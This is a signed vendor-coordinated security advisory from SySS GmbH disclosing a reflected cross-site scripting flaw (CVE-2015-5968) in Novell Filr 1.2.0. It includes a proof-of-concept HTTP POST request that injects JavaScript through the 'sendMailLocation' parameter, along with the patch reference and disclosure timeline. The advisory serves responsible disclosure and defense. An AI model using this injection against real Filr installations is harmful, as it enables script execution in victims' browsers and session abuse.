-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2015-055
Product: Novell Filr
Vendor: Novell
Affected Version(s): 1.2.0 build 846
Tested Version(s): 1.2.0 build 846
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Fixed
Vendor Notification: 2015-09-17
Solution Date: 2015-12-16
Public Disclosure: 2016-01-12
CVE Reference: CVE-2015-5968
Author of Advisory: Dr. Erlijn van Genuchten (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Novell's Filr is an application for mobile file access and collaborative 
file sharing [1]. High security is an important aspect of the application.

The SySS GmbH could find two reflected cross-site scripting
vulnerabilities in the Filr Web application.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The SySS GmbH identified that it is possible to inject JavaScript code
via the parameter "sendMailLocation". 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

When looking at the details for a certain file, it is possible to send
an e-mail to a colleague. When the following HTTP POST request is sent

POST /ssf/a/do?p_name=ss_forum&p_action=1&binderId=413&action=send_entry_email&ssUsersIdsToAdd=163&entryId=1243&novl_url=1 HTTP/1.1
Host: [host]
Referer: https://[host]/ssf/a/do?p_name=ss_forum&p_action=1&binderId=413&action=send_entry_email&ssUsersIdsToAdd=163&entryId=1243&novl_url=1
Cookie: JSESSIONID=[sessionid]
Content-Length: 684

sendMailLocation=https%3A%2F%2F[host]%2Fssf%2Fa%2Fdo%3Fp_name%3Dss_forum%26p_action%3D1%26binderId%3D422%26action%3Dsend_entry_email%26ssUsersIdsToAdd%3D163%26entryId%3D1232%26novl_url%3D17"%3balert(1)%2f%2f&ssUsersIdsToAdd=163&addresses=[email address]&self=on&users=+163+&searchText=&searchText_type=&searchText_selected=&groups=&searchText=&searchText_type=&searchText_selected=&ccusers=&searchText=&searchText_type=&searchText_selected=&ccgroups=&searchText=&searchText_type=&searchText_selected=&bccusers=&searchText=&searchText_type=&searchText_selected=&bccgroups=&searchText=&searchText_type=&searchText_selected=&subject=[subject]&mailBody=%3Cp%3E[content]%3C%2Fp%3E&okBtn=Senden

an e-mail status is provided. When the button to return to the previous 
page is clicked, the JavaScript code is executed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to information by Novell, "a fix for this issue is available in 
the Filr 1.2 Hot Patch 4, available via the Novell Patch Finder". 

https://www.novell.com/support/kb/doc.php?id=7017078

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-09-15: Vulnerability discovered
2015-09-17: Vulnerability reported to vendor
2015-12-16: Vulnerability published by vendor
2016-01-12: Vulnerability published by SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Novell Filr Web site
    https://www.novell.com/products/filr/
[1] SySS GmbH, SYSS-2015-055
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-055.txt
[2] SySS GmbH, SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Dr. Erlijn van Genuchten of
the SySS GmbH.

E-Mail: erlijn.vangenuchten@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc
Key ID: 0xBD96FF2A
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJWzBa1AAoJEAylhje9lv8qcsUQAK2yeq+M5a7Nj323S274D5LC
CnCoDe59Mbhrqmn2BPkWwOYalf4ACt2XRSygAnIR7Z3/qvtPLrynDpvwntGz+sfv
56C5JwMraf0h/uCoaSkpaqIyVDouXL1e4LTLi3QziB8rLaHaPc9n2uhQhdFTq7AY
EDS9glRxR4NV21J6cC1vVJzm9YmoVvqxRPnzp+7gfelobdkIPT6CNgBZ1eduPmHq
P+I8SPNkkv4KnAPptpN14Ch0z4sgJZk9y7CpqoBEQPYaHREygip3Lm+x6eI650Vv
08U8p0i+E/SwL1CBCySmhvI+WFPunG+SmMuJLsU/fQP3CRu4N7doKGJY+gmfKZRx
t5gcEAkq5ZTmftgHEitUTnt0Hxlgg1k1SooapVPY5ws/JnOUMhilFPUNiBhyK5+/
A7R6y5uLYvoRT2Mo2b/W2ViU8uoEWTvyn8p2R25t8CyG8WkDqGKRvkgI2YGk2Fp2
Dp3O20Q/NhBQNEaPCzpo88I2C96R7Mts0l+bMDnF5pWCPVjocZPWF/7n19Ba/ntY
S4VP70/MkBOger7u4m3OxFxuZdZZOpBNIf5lqidstsEziq1ReOlr3PzBsruM8jbk
i3sVcaQiT4X701H4g4cFfRb0wg3LwnfPQbE4FhSVY14goCZGYEjAqzANetppRTAy
+cL5xoUCTSJUisBANB3a
=8ZAH
-----END PGP SIGNATURE-----